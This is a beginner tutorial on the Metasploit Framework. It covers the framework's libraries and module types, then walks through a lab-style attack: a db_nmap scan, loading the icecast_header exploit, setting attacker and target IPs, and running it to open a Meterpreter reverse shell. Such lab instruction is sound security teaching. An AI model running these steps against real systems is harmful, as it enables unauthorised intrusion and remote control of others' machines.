Metasploit

Metasploit Framework

Metasploit framework is a very powerful tool based on Ruby and is used for penetration testing and allows you to exploit the system specific vulnerability. The metasploit framework is a suite of tools that security researchers use to identify the system vulnerability, enumerate networks, and execute the attacks.

The steps including exploiting a system using metasploit framework

1. Check the system whether it is vulnerable to an exploit.

2. Choose the exploit for specific vulnerability

3. Configure the payload

4. Run the exploit

Metasploit Architecture

Metasploit Libraries :-

It allows us to execute our exploits without having write on our own additional code such as HTTP requests or encoding of payloads.

REX :-
It handles protocols, sockets, text information ,etc and it is a basic library for most of the tasks such as HTTP, SMB, SSL and many others.

MSF CORE :-
This library defines all the metasploit framework and provides the basic API.

MSF BASE :-
It provides simplified API’s for use in metasploit framework.
The most important thing in this framework is it’s modules :

EXPLOIT :-
It executes a sequence of commands to target a specific vulnerability in a system or web application which allows to gain full access of the remote system.
It includes web application exploits, code injection and buffer overflow.

AUXILLIARY :-
It is used to perform arbitrary vulnerability which is not directly exploitation because auxiliary module does not execute payload.
It includes buzzers, scanners and DOS attacks.

PAYLOAD :-
It is a piece of code that runs after an exploit successfully takeover the vulnerable system. A payload can either a command shell or meterpreter shell. Meterpreter is most powerful and advanced payload that allows you to DLL (Dynamic link libraries) by which you can create new features.

NOP :-
It produces a series of random bits which is used to bypass standard IDS or IPS NOP signature. This module is also used with buffer overflow and ROP attacks.

POST :-
Post module refers to post exploitation enables you to gather more information or gain full access to exploited system. Examples of this module include hash dumps and database information and hidden files.

How to run metasploit :

It’s always a good practice to start database service first before actually run metasploit command by simply type:

Service postgresql start

Now run the metasploit command, it starts with the banner

msfconsole

We can also start metasploit without banner or without showing any information, for that we have add a ‘-q’ switch which refers as a ‘quiet’ mode.

msfconsole -q

Let’s try to explore help menu on msf prompt, it will give plenty of information for how to use metasploit .

help

Metasploit also give us to option to run a port scanner inside of msf prompt and it’s results directly save into our database.

db_nmap -sV 10.10.72.93

Now let’s see what information our database collected from above nmap results:

hosts

Now let’s pull the services results from database .

services

Now we can use the ‘search’ command to search the specific module to load up and we don’t need to specified the exact location of the module .

Suppose we have to search iceacst module , then we need to just specify the icecast with ‘search’ in msf prompt :

search icecast

Now for using the specific module , we can simply type ‘use’ with the module full location:

use exploit/windows/http/icecast_header

Now configuring our exploit , we can simply type ‘show options’ :

Show options

Before executing our exploit , we have to to tell the metasploit the target system IP and our local attacker machine IP .

For specifying the IP’s , we can simply type ‘set IP_Address’ :

set lhost 10.8.137.43
set rhosts 10.10.234.158

Now we all set up to execute our exploit, it’s time to say the magic word.

exploit

Now meterpreter session opened and we get our reverse shell connection back from remote machine.